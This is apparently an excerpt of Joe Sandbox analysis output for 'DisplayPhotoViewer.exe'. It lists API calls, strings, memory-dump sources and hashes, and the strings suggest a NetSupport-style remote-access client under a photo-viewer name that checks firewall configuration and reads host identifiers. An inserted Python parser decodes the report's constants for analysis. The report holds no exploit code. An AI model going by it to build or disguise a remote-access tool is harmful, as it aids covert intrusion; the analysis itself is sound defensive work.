                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CountTick
                                                                                                    • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                                    • API String ID: 536389180-1512301160
                                                                                                    • Opcode ID: 6712326f7cb336bd570c1108db24081ac50130fdae75c7c3966f1f3f11945869
                                                                                                    • Instruction ID: dbc20ce989c55911e800bd9570be593050ec5cdcd0db3d0f1d0b60d779270994
                                                                                                    • Opcode Fuzzy Hash: 6712326f7cb336bd570c1108db24081ac50130fdae75c7c3966f1f3f11945869
                                                                                                    • Instruction Fuzzy Hash: D2213874FB63F18AFB038AE19AC1365FAD1978132EF070039D514C658CE7B16280C792
                                                                                                    APIs
                                                                                                    • CoInitialize.OLE32(00000000), ref: 11092244
                                                                                                    • CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?), ref: 11092257
                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000001,111B43AC,?), ref: 11092274
                                                                                                    • CoUninitialize.OLE32 ref: 11092292
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                                    • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                                    • API String ID: 3222248624-258972079
                                                                                                    • Opcode ID: a82c26fd7a56e6dc6f3a826673e3394b5003c4943a9aca295082ba8be1e0ff14
                                                                                                    • Instruction ID: 4e180cb23d29f56530205e88458913b4593e4ad78d969186563f117c1e960f27
                                                                                                    • Opcode Fuzzy Hash: a82c26fd7a56e6dc6f3a826673e3394b5003c4943a9aca295082ba8be1e0ff14
                                                                                                    • Instruction Fuzzy Hash: 6601A574F0111D6BD700DFA5DC99AAFBB68AF40708F004168FA09D7104EB21EA4187E5
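The API listings above report arguments as raw 32-bit hex words (for example `SHGetFolderPathA(00000000,00000026,...)`, `GetSystemMetrics(00000021)`, `GetDeviceCaps(...,0000005A)` and `CoCreateInstance(?,00000000,00000001,...)`), which hides what the client is actually asking for. As an added example, not part of the Joe Sandbox report or of the analysed sample, the following Python parser reads lines in this report's own "API.MODULE(args), ref: addr" format, decodes the Windows constants that matter for this sample (CSIDL folder IDs, system metric and device-capability indices, CLSCTX flags) from values taken from the Windows SDK headers, and collects literal string arguments such as the `NSMWClass` window class and the `HNetCfg.FwMgr` ProgID as candidate indicators. The sample lines embedded in the block are constructed copies of lines on this page.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Union

# One "APIs" line from the report. The argument list and the
# "Part of subcall function XXXXXXXX:" prefix are both optional, and some lines
# have a comma before "ref:" while others (calls with no recorded args) do not.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Windows constants worth decoding for this sample, keyed by (API, 0-based
# argument index). Values are the ones defined in the Windows SDK headers.
CSIDL = {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA",
         0x24: "CSIDL_WINDOWS", 0x25: "CSIDL_SYSTEM", 0x26: "CSIDL_PROGRAM_FILES"}
SYSTEM_METRICS = {0: "SM_CXSCREEN", 1: "SM_CYSCREEN", 4: "SM_CYCAPTION",
                  15: "SM_CYMENU", 32: "SM_CXFRAME", 33: "SM_CYFRAME"}
DEVICE_CAPS = {88: "LOGPIXELSX", 90: "LOGPIXELSY"}
CLSCTX = {1: "CLSCTX_INPROC_SERVER", 4: "CLSCTX_LOCAL_SERVER"}
ARG_DECODERS = {
    ("SHGetFolderPathA", 1): CSIDL,
    ("GetSystemMetrics", 0): SYSTEM_METRICS,
    ("GetDeviceCaps", 1): DEVICE_CAPS,
    ("CoCreateInstance", 2): CLSCTX,
}


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                                  # address of the call site
    caller: Optional[int]                     # set for "Part of subcall function" lines
    args: List[Union[int, str, None]]         # int = hex word, str = literal, None = '?'
    decoded: Dict[int, str] = field(default_factory=dict)


def _parse_arg(tok: str) -> Union[int, str, None]:
    tok = tok.strip()
    if tok == "?":
        return None                           # value not known statically
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)                   # caveat: an 8-char hex-looking literal lands here too
    return tok                                # string literal such as NSMWClass or HNetCfg.FwMgr


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one report line; returns None for headers and non-API lines."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [_parse_arg(t) for t in raw.split(",")] if raw else []
    call = ApiCall(
        api=m.group("api"), module=m.group("module"), ref=int(m.group("ref"), 16),
        caller=int(m.group("caller"), 16) if m.group("caller") else None, args=args,
    )
    for i, val in enumerate(call.args):
        table = ARG_DECODERS.get((call.api, i))
        if table and isinstance(val, int) and val in table:
            call.decoded[i] = table[val]
    return call


def parse_report(lines: List[str]) -> List[ApiCall]:
    return [c for c in (parse_api_line(ln) for ln in lines) if c is not None]


def string_arguments(calls: List[ApiCall]) -> List[str]:
    """Literal string arguments in order of first appearance: window class names,
    ProgIDs, DLL names and resolved export names are all candidate indicators."""
    seen: List[str] = []
    for c in calls:
        for a in c.args:
            if isinstance(a, str) and a not in seen:
                seen.append(a)
    return seen


def describe(call: ApiCall) -> str:
    """Render a call with decoded constants substituted for raw hex words."""
    parts = []
    for i, a in enumerate(call.args):
        if i in call.decoded:
            parts.append(call.decoded[i])
        elif a is None:
            parts.append("?")
        elif isinstance(a, int):
            parts.append(f"0x{a:08X}")
        else:
            parts.append(repr(a))
    prefix = f"[via {call.caller:08X}] " if call.caller is not None else ""
    return f"{prefix}{call.ref:08X} {call.api}({', '.join(parts)})"


# Constructed sample input: copies of API lines from this report.
SAMPLE_LINES = [
    "• Part of subcall function 1113B690: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1113B727",
    "• GetSystemMetrics.USER32(00000021), ref: 1112C0F9",
    "• GetDeviceCaps.GDI32(00000000,0000005A), ref: 1112C11E",
    "• CreateWindowExA.USER32(?,NSMWClass,0B2206B0,00CE0000,80000000,80000000,?,?,00000000,?,11000000,00000000), ref: 1112C169",
    "• CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?), ref: 11092257",
    "• CoCreateInstance.OLE32(?,00000000,00000001,111B43AC,?), ref: 11092274",
    "• CoUninitialize.OLE32 ref: 11092292",
    "• SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110784B), ref: 1113AF5E",
    "• SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113AFBB",
]

if __name__ == "__main__":
    calls = parse_report(SAMPLE_LINES)
    for c in calls:
        print(describe(c))
    print("string indicators:", string_arguments(calls))
```

Run against the two `SHGetFolderPathA` lines this prints `CSIDL_PROGRAM_FILES` and `CSIDL_APPDATA`, which is where the client resolves its install and per-user directories; the `GetDeviceCaps` index decodes to `LOGPIXELSY` (screen DPI, consistent with the window-sizing calls around it) and the `CoCreateInstance` context to `CLSCTX_INPROC_SERVER`. The decoder tables only cover constants present on this page; extend `ARG_DECODERS` for other APIs as needed, and treat the 8-hex-character heuristic in `_parse_arg` as exactly that.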
                                                                                                    APIs
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,111085B5,11108150,00000001,00000000), ref: 11107647
                                                                                                    • CreateThread.KERNEL32(00000000,111085B5,00000001,00000000,00000000,0000000C), ref: 1110766A
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,111085B5,11108150,00000001,00000000,?,?,?,?,?,1102F5F3), ref: 11107697
                                                                                                    • CloseHandle.KERNEL32(?,?,111085B5,11108150,00000001,00000000,?,?,?,?,?,1102F5F3), ref: 111076A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                    • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                    • API String ID: 3360349984-1136101629
                                                                                                    • Opcode ID: 4ca9d346845fa25128a1753a44eb42afc516d5f6881e149335a6838107f3435e
                                                                                                    • Instruction ID: 202952010c2a209b0a0bd61c2994d7b30ab434dc4522c0f1e308addca307e50e
                                                                                                    • Opcode Fuzzy Hash: 4ca9d346845fa25128a1753a44eb42afc516d5f6881e149335a6838107f3435e
                                                                                                    • Instruction Fuzzy Hash: 7B0171767407016FE7208E5AEC85F5BBBA8EB54725F108229FA55962C4DA70E4058BB0
                                                                                                    Strings
                                                                                                    • %02x , xrefs: 1106D8DD
                                                                                                    • Queue EV_CALLED_CONTROL: session=%d addr=%s extra=%s, xrefs: 1106DBA0
                                                                                                    • Error %dz discarded %-4u bytes: %s, xrefs: 1106D8FC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: %02x $Error %dz discarded %-4u bytes: %s$Queue EV_CALLED_CONTROL: session=%d addr=%s extra=%s
                                                                                                    • API String ID: 0-2590468221
                                                                                                    • Opcode ID: e8dea0c847aa651228b1e0d44732d9a2f8feda8d33b60ffd10a237089336bbb1
                                                                                                    • Instruction ID: ebb7493f0f2de6412e3c01577b3bec67747b6ceec621bb1ebc7724e91f1cc3c0
                                                                                                    • Opcode Fuzzy Hash: e8dea0c847aa651228b1e0d44732d9a2f8feda8d33b60ffd10a237089336bbb1
                                                                                                    • Instruction Fuzzy Hash: 36E183B4E0020A9BDB14DF54C990F6EB7ADFF89314F148159E9499F389DA70EC81CBA1
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf
                                                                                                    • String ID: %s%s%s.bin$910646$_HF$_HW$_SW
                                                                                                    • API String ID: 2111968516-3152437985
                                                                                                    • Opcode ID: cb918f652d525e97b278af3517340a45392d6c1e7babdc5e4dcaff5f27f9f7a5
                                                                                                    • Instruction ID: c2332db2771bf07b50f11cf3bb8a73cd008e9a4d3eb5a97e60ad1037deff3be9
                                                                                                    • Opcode Fuzzy Hash: cb918f652d525e97b278af3517340a45392d6c1e7babdc5e4dcaff5f27f9f7a5
                                                                                                    • Instruction Fuzzy Hash: CDE09B71D0870C1FF641814C690579FBACC1B04769FC08454FEDAA6287F5259500C193
                                                                                                    APIs
                                                                                                    • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 110FAD93
                                                                                                    • GetStockObject.GDI32(00000004), ref: 110FADEB
                                                                                                    • RegisterClassA.USER32(?), ref: 110FADFF
                                                                                                    • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00100000,00000000,00000000,00000000), ref: 110FAE3A
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                                    • String ID: NSMDesktopWnd
                                                                                                    • API String ID: 2669163067-206650970
                                                                                                    • Opcode ID: 3ec9fb06d36f15928af86bf9006faee28849d72b3f1898888c247150109798cc
                                                                                                    • Instruction ID: 9f8dd81fb97131f2a17aa61c2b67468a12f398e0ba51ba15830c75074ddcef4f
                                                                                                    • Opcode Fuzzy Hash: 3ec9fb06d36f15928af86bf9006faee28849d72b3f1898888c247150109798cc
                                                                                                    • Instruction Fuzzy Hash: E031D4B4D0165AAFCB41DFA9D880A9EFFF4FB08314F50862EE829E7240E7345540CB94
                                                                                                    APIs
                                                                                                      • Part of subcall function 111097A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 111097CA
                                                                                                      • Part of subcall function 111097A0: __wsplitpath.LIBCMT ref: 111097E5
                                                                                                      • Part of subcall function 111097A0: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 11109819
                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 111098E8
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                                    • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                    • API String ID: 806825551-1858614750
                                                                                                    • Opcode ID: f9d9959397344636dc7975019574d2977f5b5c00808a9d528d84c34c8c64f6b7
                                                                                                    • Instruction ID: f45ce0f7169db0a25d1e6fc74838806ea3ee33c24c158f97c3dbd1adfa10429d
                                                                                                    • Opcode Fuzzy Hash: f9d9959397344636dc7975019574d2977f5b5c00808a9d528d84c34c8c64f6b7
                                                                                                    • Instruction Fuzzy Hash: DF216436E0018E9BD301CE309EA0BBBFBAA9FC6204F054469EC69C7241F626DA04C790
                                                                                                    APIs
                                                                                                      • Part of subcall function 11139F90: GetCurrentProcess.KERNEL32(11027F7F,?,1113A1E3,?), ref: 11139F9C
                                                                                                      • Part of subcall function 11139F90: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe,00000104,?,1113A1E3,?), ref: 11139FB9
                                                                                                    • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1113A5C5
                                                                                                    • ResetEvent.KERNEL32(00000BD4), ref: 1113A5D9
                                                                                                    • SetEvent.KERNEL32(00000BD4), ref: 1113A5EF
                                                                                                    • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1113A5FE
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                                    • String ID: MiniDump
                                                                                                    • API String ID: 1494854734-2840755058
                                                                                                    • Opcode ID: 4382f9d7793314fe230039c3ab167cbcc668c3fd6bf60283c774d99928748dbd
                                                                                                    • Instruction ID: ed85a08320420e265ce7697ee8aa2d1ea6f32357d8646fad4537fb3caec7b9ac
                                                                                                    • Opcode Fuzzy Hash: 4382f9d7793314fe230039c3ab167cbcc668c3fd6bf60283c774d99928748dbd
                                                                                                    • Instruction Fuzzy Hash: 9811EC72E502156BE301DBE5AC91F5EF7989B84739F114234F924D71C8EB70A9018BF5
                                                                                                    APIs
                                                                                                    • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 1113CCEF
                                                                                                    • wsprintfA.USER32 ref: 1113CD26
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                    • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                    • API String ID: 1985783259-2296142801
                                                                                                    • Opcode ID: 9f951b9eee57bf8c9f736079b0fca5555432e31cf2e708445e98ac77c1bc3c53
                                                                                                    • Instruction ID: a9029a21a3f55972a632b43b74ee58a4c52104f32f7088f8ab5a1a445247dcee
                                                                                                    • Opcode Fuzzy Hash: 9f951b9eee57bf8c9f736079b0fca5555432e31cf2e708445e98ac77c1bc3c53
                                                                                                    • Instruction Fuzzy Hash: F111E5FAA1011867C710DA65ED85FEEF76C9B84729F400165FF09B7149EA30AA0187A9
                                                                                                    APIs
                                                                                                    • _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111583B1: __FF_MSGBANNER.LIBCMT ref: 111583CA
                                                                                                      • Part of subcall function 111583B1: __NMSG_WRITE.LIBCMT ref: 111583D1
                                                                                                      • Part of subcall function 111583B1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 111583F6
                                                                                                    • wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • _memset.LIBCMT ref: 111077F7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                                    • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                                    • API String ID: 3234921582-2664294811
                                                                                                    • Opcode ID: bf5853befffb252c44a32a5b0653fbe8a40c3126add25175a497d30b44db0839
                                                                                                    • Instruction ID: 968d62244f9bf34ff5e22c4a98ef88c83d2bf086518960ed259ccedc48f06065
                                                                                                    • Opcode Fuzzy Hash: bf5853befffb252c44a32a5b0653fbe8a40c3126add25175a497d30b44db0839
                                                                                                    • Instruction Fuzzy Hash: 3AF0F6B6E4151863C760DA65ED01FEFF76C9F81608F400069EE0467242EA74AB05C7D6
                                                                                                    APIs
                                                                                                    • wsprintfA.USER32 ref: 1102FE86
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                    • String ID: %s%s.bin$910646$clientinv.cpp$m_pDoInv == NULL
                                                                                                    • API String ID: 4180936305-2782831137
                                                                                                    • Opcode ID: 571bb0c5ade0659a9f105093dc4fc95c204d326ca185540cfd0bc09d303e3201
                                                                                                    • Instruction ID: 4812e2c773c366c78948061ec2f2f81211db31fda714fb300b1676a6b92b4064
                                                                                                    • Opcode Fuzzy Hash: 571bb0c5ade0659a9f105093dc4fc95c204d326ca185540cfd0bc09d303e3201
                                                                                                    • Instruction Fuzzy Hash: FB21B3B5E04705AFEB10CF65DC40BABB7E8EB44B58F10493EE86597381EB34A900CB61
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNEL32(1113B028,00000000,?,1113B028,00000000), ref: 1113A9FC
                                                                                                    • __strdup.LIBCMT ref: 1113AA17
                                                                                                      • Part of subcall function 1107D210: _strrchr.LIBCMT ref: 1107D21E
                                                                                                      • Part of subcall function 1113A9E0: _free.LIBCMT ref: 1113AA3E
                                                                                                    • _free.LIBCMT ref: 1113AA4C
                                                                                                      • Part of subcall function 11158445: HeapFree.KERNEL32(00000000,00000000,?,11160F66,00000000,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 1115845B
                                                                                                      • Part of subcall function 11158445: GetLastError.KERNEL32(00000000,?,11160F66,00000000,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 1115846D
                                                                                                    • CreateDirectoryA.KERNEL32(1113B028,00000000,?,?,?,1113B028,00000000), ref: 1113AA57
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 398584587-0
                                                                                                    • Opcode ID: d4be81e038093f7cc673d49315beed639c0140b528f9647da0f76ceb9819d3df
                                                                                                    • Instruction ID: 5773ec2b2ea8cdcddb7b94a0cf006afd2c00aa41893a1b7e486ab9af1975557a
                                                                                                    • Opcode Fuzzy Hash: d4be81e038093f7cc673d49315beed639c0140b528f9647da0f76ceb9819d3df
                                                                                                    • Instruction Fuzzy Hash: 4D01F53BB101161AF741157D7E01BBFBB9D8BC267AF054135FC1CD6299F652E10742A2
                                                                                                    APIs
                                                                                                      • Part of subcall function 1113AEB0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11189A50), ref: 1113AF1D
                                                                                                      • Part of subcall function 1113AEB0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110784B), ref: 1113AF5E
                                                                                                      • Part of subcall function 1113AEB0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113AFBB
                                                                                                    • wsprintfA.USER32 ref: 1113BB8E
                                                                                                    • wsprintfA.USER32 ref: 1113BBA4
                                                                                                      • Part of subcall function 111395A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110784B,75BF8400,?), ref: 11139637
                                                                                                      • Part of subcall function 111395A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11139657
                                                                                                      • Part of subcall function 111395A0: CloseHandle.KERNEL32(00000000), ref: 1113965F
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                                    • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                                    • API String ID: 3779116287-2600120591
                                                                                                    • Opcode ID: bf8ad4c271e022cbfc4851942c974fc1eb87712d7338be7a8daae4851b5ebf30
                                                                                                    • Instruction ID: 19a82a5669adbd5d84511c9ac25418f2ec4c89046835a3c9e5a4f0115d71f71b
                                                                                                    • Opcode Fuzzy Hash: bf8ad4c271e022cbfc4851942c974fc1eb87712d7338be7a8daae4851b5ebf30
                                                                                                    • Instruction Fuzzy Hash: 7301F17AD1921D62DA10DBB0AC02BEEF76C8B85329F400196EC0996188FD30BA448AA5
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110784B,75BF8400,?), ref: 11139637
                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11139657
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1113965F
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile$CloseHandle
                                                                                                    • String ID: "
                                                                                                    • API String ID: 1443461169-123907689
                                                                                                    • Opcode ID: 56ddfe995fad7f7ad01f7aed1757c08503b235ea1f055dc7748f4fe5493489f1
                                                                                                    • Instruction ID: 1c2477c3206a523109fe385bc688dc8158c49b02070ad5bfc4a67a45e2074a3c
                                                                                                    • Opcode Fuzzy Hash: 56ddfe995fad7f7ad01f7aed1757c08503b235ea1f055dc7748f4fe5493489f1
                                                                                                    • Instruction Fuzzy Hash: AC21DD3161424DAFE712CE38DD50BD9BBA59B82324F2046E5E8C6CB1C9FE709A89C750
                                                                                                    APIs
